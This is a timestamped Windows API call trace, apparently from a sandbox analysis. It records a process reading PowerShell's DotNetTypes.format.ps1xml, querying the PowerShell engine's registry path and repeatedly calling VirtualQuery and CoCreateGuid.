	[0316.612] VirtualQuery (in: lpAddress=0x1cb9e0, lpBuffer=0x1cc8a0, dwLength=0x30 | out: lpBuffer=0x1cc8a0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.613] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x601b7412, Data2=0x7fef, Data3=0x4fc6, Data4=([0]=0x92, [1]=0xae, [2]=0xb2, [3]=0xde, [4]=0x37, [5]=0x4b, [6]=0x3e, [7]=0x9c))) returned 0x0
	[0316.613] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xcd8c50ac, Data2=0xc9fe, Data3=0x4bf3, Data4=([0]=0xb0, [1]=0xde, [2]=0x8e, [3]=0xb5, [4]=0x83, [5]=0x80, [6]=0x46, [7]=0xed))) returned 0x0
	[0316.614] VirtualQuery (in: lpAddress=0x1cbb90, lpBuffer=0x1cca50, dwLength=0x30 | out: lpBuffer=0x1cca50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.615] VirtualQuery (in: lpAddress=0x1cbb90, lpBuffer=0x1cca50, dwLength=0x30 | out: lpBuffer=0x1cca50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.616] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x16013e6e, Data2=0xb0b2, Data3=0x400a, Data4=([0]=0xb1, [1]=0x7f, [2]=0x58, [3]=0x3c, [4]=0x29, [5]=0x93, [6]=0x77, [7]=0xef))) returned 0x0
	[0316.619] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x4df63f76, Data2=0x2355, Data3=0x48dd, Data4=([0]=0xa0, [1]=0x57, [2]=0xc6, [3]=0x83, [4]=0xcb, [5]=0x2b, [6]=0xc8, [7]=0xf8))) returned 0x0
	[0316.620] VirtualQuery (in: lpAddress=0x1cbde0, lpBuffer=0x1ccca0, dwLength=0x30 | out: lpBuffer=0x1ccca0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.620] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.620] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.621] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xe6421d43, Data2=0x38db, Data3=0x47bf, Data4=([0]=0x8c, [1]=0xba, [2]=0x8b, [3]=0x89, [4]=0xfb, [5]=0x15, [6]=0xf2, [7]=0x85))) returned 0x0
	[0316.621] VirtualQuery (in: lpAddress=0x1cbde0, lpBuffer=0x1ccca0, dwLength=0x30 | out: lpBuffer=0x1ccca0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.621] VirtualQuery (in: lpAddress=0x1cbc00, lpBuffer=0x1ccac0, dwLength=0x30 | out: lpBuffer=0x1ccac0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.622] VirtualQuery (in: lpAddress=0x1cb450, lpBuffer=0x1cc310, dwLength=0x30 | out: lpBuffer=0x1cc310*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.622] VirtualQuery (in: lpAddress=0x1cb450, lpBuffer=0x1cc310, dwLength=0x30 | out: lpBuffer=0x1cc310*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.622] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x77e953f, Data2=0xb44b, Data3=0x4318, Data4=([0]=0x95, [1]=0xfe, [2]=0x69, [3]=0xc2, [4]=0xc2, [5]=0x83, [6]=0x67, [7]=0x2))) returned 0x0
	[0316.622] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x4e54f3c4, Data2=0xa02b, Data3=0x40e7, Data4=([0]=0x8e, [1]=0x48, [2]=0x75, [3]=0xb0, [4]=0xc1, [5]=0x78, [6]=0xb4, [7]=0xf1))) returned 0x0
	[0316.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cc930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0316.623] SetErrorMode (uMode=0x1) returned 0x1
	[0316.623] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0316.623] GetFileType (hFile=0x308) returned 0x1
	[0316.623] SetErrorMode (uMode=0x1) returned 0x1
	[0316.623] GetFileType (hFile=0x308) returned 0x1
	[0316.623] ReadFile (in: hFile=0x308, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.625] ReadFile (in: hFile=0x308, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.625] ReadFile (in: hFile=0x308, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.625] ReadFile (in: hFile=0x308, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.626] ReadFile (in: hFile=0x308, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.626] ReadFile (in: hFile=0x308, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.626] ReadFile (in: hFile=0x308, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.627] ReadFile (in: hFile=0x308, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.627] ReadFile (in: hFile=0x308, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.628] ReadFile (in: hFile=0x308, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.628] ReadFile (in: hFile=0x308, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.628] ReadFile (in: hFile=0x308, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.628] ReadFile (in: hFile=0x308, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.629] ReadFile (in: hFile=0x308, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.629] ReadFile (in: hFile=0x308, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.629] ReadFile (in: hFile=0x308, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.630] ReadFile (in: hFile=0x308, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.631] ReadFile (in: hFile=0x308, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x1cceb8*=0xbce, lpOverlapped=0x0) returned 1
	[0316.631] ReadFile (in: hFile=0x308, lpBuffer=0x33f58ae, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x33f58ae*, lpNumberOfBytesRead=0x1cceb8*=0x0, lpOverlapped=0x0) returned 1
	[0316.631] ReadFile (in: hFile=0x308, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x1cceb8*=0x0, lpOverlapped=0x0) returned 1
	[0316.631] CloseHandle (hObject=0x308) returned 1
	[0316.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0316.631] SetErrorMode (uMode=0x1) returned 0x1
	[0316.631] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cce60 | out: lpFileInformation=0x1cce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0316.631] SetErrorMode (uMode=0x1) returned 0x1
	[0316.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0316.632] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccf48 | out: phkResult=0x1ccf48*=0x308) returned 0x0
	[0316.632] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccecc, lpData=0x0, lpcbData=0x1ccec8*=0x0 | out: lpType=0x1ccecc*=0x1, lpData=0x0, lpcbData=0x1ccec8*=0x56) returned 0x0
	[0316.632] CoTaskMemAlloc (cb=0x5a) returned 0x2f04c0
	[0316.632] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cce9c, lpData=0x2f04c0, lpcbData=0x1cce98*=0x56 | out: lpType=0x1cce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cce98*=0x56) returned 0x0
	[0316.632] CoTaskMemFree (pv=0x2f04c0) 
	[0316.632] RegCloseKey (hKey=0x308) returned 0x0
	[0316.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0316.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0316.930] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xb8123a61, Data2=0x2a8d, Data3=0x4f98, Data4=([0]=0x9d, [1]=0xbf, [2]=0x99, [3]=0x10, [4]=0xc8, [5]=0x83, [6]=0xb6, [7]=0x95))) returned 0x0
	[0316.930] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xe43b1f89, Data2=0xb8e4, Data3=0x490c, Data4=([0]=0xae, [1]=0x65, [2]=0xea, [3]=0x56, [4]=0x6f, [5]=0xbf, [6]=0x3c, [7]=0xd5))) returned 0x0
	[0316.931] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x17e4766c, Data2=0x7309, Data3=0x423d, Data4=([0]=0xb8, [1]=0x45, [2]=0xbe, [3]=0xe0, [4]=0x33, [5]=0x32, [6]=0x59, [7]=0x44))) returned 0x0
	[0316.931] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x6f767807, Data2=0x5296, Data3=0x4d40, Data4=([0]=0xb2, [1]=0xd8, [2]=0xb, [3]=0x26, [4]=0x2, [5]=0xbe, [6]=0xed, [7]=0xf3))) returned 0x0
	[0316.931] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x740d31b2, Data2=0xb83c, Data3=0x4d87, Data4=([0]=0x82, [1]=0xce, [2]=0x4b, [3]=0xa7, [4]=0xae, [5]=0x67, [6]=0x9f, [7]=0x92))) returned 0x0
	[0316.931] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x9fe97d49, Data2=0x9cb3, Data3=0x4fa1, Data4=([0]=0x80, [1]=0xb4, [2]=0x9a, [3]=0x21, [4]=0xa2, [5]=0x2d, [6]=0x3a, [7]=0xa8))) returned 0x0
	[0316.931] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0316.932] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xe77bf889, Data2=0x18c5, Data3=0x4562, Data4=([0]=0x82, [1]=0xc1, [2]=0xef, [3]=0x14, [4]=0x7e, [5]=0xb4, [6]=0xde, [7]=0x16))) returned 0x0
	[0316.933] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.934] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.935] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xe1a5f78b, Data2=0x585e, Data3=0x475d, Data4=([0]=0x8f, [1]=0x58, [2]=0xd1, [3]=0x9b, [4]=0x8a, [5]=0x6f, [6]=0x8e, [7]=0x40))) returned 0x0
	[0316.935] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xffefe335, Data2=0x6b57, Data3=0x4c4f, Data4=([0]=0x94, [1]=0x39, [2]=0x65, [3]=0xf9, [4]=0x7e, [5]=0x1d, [6]=0xc7, [7]=0x57))) returned 0x0
	[0316.935] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x67816834, Data2=0x9da6, Data3=0x4981, Data4=([0]=0x89, [1]=0x8a, [2]=0xd1, [3]=0x81, [4]=0xc1, [5]=0x9f, [6]=0xa5, [7]=0x9a))) returned 0x0
	[0316.935] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x1627b18d, Data2=0xdfb0, Data3=0x48b0, Data4=([0]=0xad, [1]=0x31, [2]=0x22, [3]=0xb2, [4]=0x28, [5]=0x6a, [6]=0xbe, [7]=0x56))) returned 0x0
	[0316.936] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.937] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x846201c8, Data2=0x58fd, Data3=0x47f8, Data4=([0]=0xbd, [1]=0xd6, [2]=0xf4, [3]=0x78, [4]=0xb0, [5]=0x15, [6]=0x23, [7]=0x5))) returned 0x0
	[0316.937] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.939] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.939] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.939] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.940] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.940] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xeca9cc53, Data2=0x8c72, Data3=0x4c97, Data4=([0]=0xaa, [1]=0x73, [2]=0xb0, [3]=0xe9, [4]=0xbe, [5]=0x3b, [6]=0x70, [7]=0xe0))) returned 0x0
	[0316.940] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x6fe46184, Data2=0x83aa, Data3=0x4a50, Data4=([0]=0x82, [1]=0x42, [2]=0xe7, [3]=0xfc, [4]=0x37, [5]=0x93, [6]=0x91, [7]=0x4e))) returned 0x0
	[0316.940] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xec2b2e45, Data2=0xc566, Data3=0x49c7, Data4=([0]=0xb4, [1]=0x60, [2]=0x61, [3]=0xe6, [4]=0x8f, [5]=0xee, [6]=0xce, [7]=0x4d))) returned 0x0
	[0316.940] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x366693f8, Data2=0x2bbe, Data3=0x4e72, Data4=([0]=0xb7, [1]=0x3d, [2]=0x5e, [3]=0x99, [4]=0x9c, [5]=0x5, [6]=0x29, [7]=0x19))) returned 0x0
	[0316.940] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xbe2b1c5b, Data2=0xb3b, Data3=0x4904, Data4=([0]=0x84, [1]=0x18, [2]=0x44, [3]=0x68, [4]=0xd5, [5]=0x4f, [6]=0x7b, [7]=0x3c))) returned 0x0
	[0316.940] VirtualQuery (in: lpAddress=0x1cbde0, lpBuffer=0x1ccca0, dwLength=0x30 | out: lpBuffer=0x1ccca0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.940] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xbfa52dac, Data2=0x7793, Data3=0x487a, Data4=([0]=0x9e, [1]=0xa2, [2]=0xd8, [3]=0x4b, [4]=0xcb, [5]=0xd2, [6]=0x10, [7]=0x3f))) returned 0x0
	[0316.941] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xf38bb452, Data2=0x52a8, Data3=0x4535, Data4=([0]=0x85, [1]=0x5d, [2]=0xb9, [3]=0x54, [4]=0x9b, [5]=0x9d, [6]=0x96, [7]=0xb7))) returned 0x0
	[0316.941] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xb327cfb, Data2=0x35e6, Data3=0x4e34, Data4=([0]=0x9a, [1]=0x40, [2]=0xc1, [3]=0xd, [4]=0xb1, [5]=0x1d, [6]=0x5c, [7]=0x44))) returned 0x0
	[0316.941] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x7eb46be1, Data2=0x29a1, Data3=0x47cd, Data4=([0]=0x89, [1]=0xb6, [2]=0xbe, [3]=0xc2, [4]=0x2b, [5]=0xe, [6]=0x2b, [7]=0xe9))) returned 0x0
	[0316.941] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x7aa03ca3, Data2=0x51bf, Data3=0x44cb, Data4=([0]=0xb2, [1]=0x35, [2]=0x53, [3]=0x39, [4]=0xf9, [5]=0xdf, [6]=0x74, [7]=0x91))) returned 0x0
	[0316.941] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x68961741, Data2=0xe669, Data3=0x4011, Data4=([0]=0xad, [1]=0x11, [2]=0x9a, [3]=0x9c, [4]=0xbb, [5]=0x84, [6]=0xda, [7]=0x6d))) returned 0x0
	[0316.941] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x9e6ba6f9, Data2=0x781, Data3=0x4aaf, Data4=([0]=0x8f, [1]=0x4c, [2]=0xba, [3]=0x2b, [4]=0x76, [5]=0xe8, [6]=0x68, [7]=0xfd))) returned 0x0
	[0316.942] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x7bab2ca4, Data2=0x3b07, Data3=0x47df, Data4=([0]=0xb1, [1]=0x5f, [2]=0xd6, [3]=0x74, [4]=0xd, [5]=0x2a, [6]=0x1e, [7]=0x70))) returned 0x0
	[0316.942] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x511fd64f, Data2=0x3255, Data3=0x497b, Data4=([0]=0xa5, [1]=0xf, [2]=0x93, [3]=0x28, [4]=0x71, [5]=0x39, [6]=0xed, [7]=0xd2))) returned 0x0
	[0316.942] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xf4c266ea, Data2=0x695f, Data3=0x436a, Data4=([0]=0x92, [1]=0x85, [2]=0x9d, [3]=0x29, [4]=0x54, [5]=0xbf, [6]=0x41, [7]=0x88))) returned 0x0
	[0316.942] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xc62eab2e, Data2=0x2ce0, Data3=0x421f, Data4=([0]=0xbc, [1]=0x24, [2]=0x23, [3]=0xc, [4]=0xb9, [5]=0xe7, [6]=0xfd, [7]=0x36))) returned 0x0
	[0316.942] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xe92936d8, Data2=0x9626, Data3=0x4d92, Data4=([0]=0x9a, [1]=0x92, [2]=0xc, [3]=0x89, [4]=0x7, [5]=0x7c, [6]=0xc9, [7]=0x4d))) returned 0x0
	[0316.942] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x66831b35, Data2=0x3d3d, Data3=0x4498, Data4=([0]=0xb2, [1]=0x63, [2]=0x7a, [3]=0xe1, [4]=0xb2, [5]=0x93, [6]=0x68, [7]=0x82))) returned 0x0
	[0316.943] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x103d0fc0, Data2=0xe3fc, Data3=0x4fee, Data4=([0]=0x96, [1]=0xb6, [2]=0xf4, [3]=0x3a, [4]=0x8f, [5]=0x1, [6]=0x38, [7]=0x47))) returned 0x0
	[0316.943] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xb6cb37eb, Data2=0xdde9, Data3=0x4c48, Data4=([0]=0x85, [1]=0x38, [2]=0xcd, [3]=0xc1, [4]=0xc4, [5]=0x7b, [6]=0x85, [7]=0x9a))) returned 0x0
	[0316.943] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x30fcbd32, Data2=0xe770, Data3=0x4ebf, Data4=([0]=0xa9, [1]=0x33, [2]=0xe6, [3]=0xb8, [4]=0xfd, [5]=0xc0, [6]=0x17, [7]=0x8e))) returned 0x0
